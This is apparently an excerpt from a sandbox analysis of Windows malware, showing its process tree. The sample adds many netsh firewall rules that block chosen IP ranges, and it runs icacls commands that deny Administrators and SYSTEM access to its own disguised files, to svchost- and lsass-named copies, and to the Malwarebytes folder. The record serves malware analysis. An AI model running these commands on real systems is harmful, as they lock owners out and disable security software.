      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4192
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:4256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4828
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:5100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4756
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:4220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:5008
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:4984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:4596
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:4664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:2540
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:4304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
      4⤵
      PID:2260
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
        5⤵
        
        PID:2944
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
      4⤵
      PID:4928
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
        5⤵
        
        PID:5096
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:4796
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:2036
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:4656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:1560
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:5084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:4976
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:2016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
      4⤵
      PID:4344
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
        5⤵
        
        PID:556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
      4⤵
      PID:4948
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
        5⤵
        
        PID:5064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
      4⤵
      PID:4556
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
        5⤵
        
        PID:4924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
      4⤵
      PID:4292
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
        5⤵
        
        PID:4496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
      4⤵
      PID:4872
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
        5⤵
        
        PID:4680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
      4⤵
      PID:4536
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
        5⤵
        
        PID:4612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
        5⤵
        
        PID:4336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
      4⤵
      PID:4436
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
        5⤵
        
        PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
      4⤵
      PID:4216
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
        5⤵
        
        PID:5076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
      4⤵
      PID:4464
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
        5⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
      4⤵
      PID:1836
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
        5⤵
        
        PID:4744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
      4⤵
      PID:4416
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
        5⤵
        
        PID:1444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
      4⤵
      PID:3996
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
        5⤵
        
        PID:5164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
        5⤵
        
        PID:5172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
      4⤵
      PID:5204
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
        5⤵
        
        PID:5328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
      4⤵
      PID:5224
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
        5⤵
        
        PID:5340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
        5⤵
        
        PID:5492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
      4⤵
      PID:5388
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
        5⤵
        
        PID:5480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
      4⤵
      PID:5540
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
        5⤵
        
        PID:5648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
      4⤵
      PID:5556
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
        5⤵
        
        PID:5656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
      4⤵
      PID:5704
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
        5⤵
        
        PID:5812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
      4⤵
      PID:5716
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
        5⤵
        
        PID:5824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
        5⤵
        
        PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
      4⤵
      PID:5864
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
        5⤵
        
        PID:5960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
      4⤵
      PID:6036
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
        5⤵
        
        PID:6140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
      4⤵
      PID:6048
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
        5⤵
        
        PID:5128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
      4⤵
      PID:4356
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
        5⤵
        
        PID:4276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
      4⤵
      PID:4408
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
        5⤵
        
        PID:5112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4484
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4240
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:4332
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4848
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:5620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5320
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:5308
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:5496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5236
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:5256
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
      4⤵
      PID:5460
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5976
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:5640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
      4⤵
      PID:6080
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny Администраторы:(F)
        5⤵
        
        PID:5568
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
      4⤵
      PID:6024
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny System:(F)
        5⤵
        
        PID:5028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
      4⤵
      PID:6028
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny система:(F)
        5⤵
        Modifies file permissions
        
        PID:5488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5808
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:5772
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5728
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:5900
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
      4⤵
      PID:5604
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
      4⤵
      PID:5088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
      4⤵
      PID:6076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny система:(F)
        5⤵
        
        PID:5124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:2504
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4568
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:5564
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5484
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:5392
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5820
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:5476
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5756
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5872
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:5616
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
        5⤵
        
        PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
      4⤵
      PID:4212
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
      4⤵
      PID:4844
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
      4⤵
      PID:5368
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
      4⤵
      PID:5572
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny Администраторы:(F)
        5⤵
        
        PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
      4⤵
      PID:5380
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny System:(F)
        5⤵
        
        PID:5776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
      4⤵
      PID:6060
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:5576
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        
        PID:6112
  - - C:\Windows\SysWOW64\cmd.exe
